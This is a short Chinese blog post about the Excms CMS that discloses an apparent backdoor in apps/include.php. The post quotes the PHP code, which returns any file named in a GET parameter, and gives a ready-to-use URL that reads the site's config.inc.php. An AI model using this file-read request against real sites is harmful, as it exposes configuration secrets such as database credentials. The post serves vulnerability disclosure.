某天遇到Excms的系统，官网http://www.excms.cn/

 

 于GG搜索excms漏洞，发现：www.2cto.com/Article/201101/82338.html 分析中是作者明显藏有后门的漏洞。

 

下载源码分析，很明显就能找到另一个疑似后门的漏洞（为什么说疑似？因为也不能确定，说不定就是有这样的程序员，呵呵。。）

 

 漏洞文件：

apps/include.php -

 源码：

//加载系统配置文件-

 require_once('../configuration/inc/common.inc.php');

 

$file = $_GET['file'];

 if($file!='' && file_exists(EXCMS_PATH.$file)){

        echo file_get_contents(EXCMS_PATH.$file);

 

 不用看就知道了吧，呵呵。。。

http://www.2cto.com /apps/include.php?file=sitedata/config.inc.php

 

修复：不用说了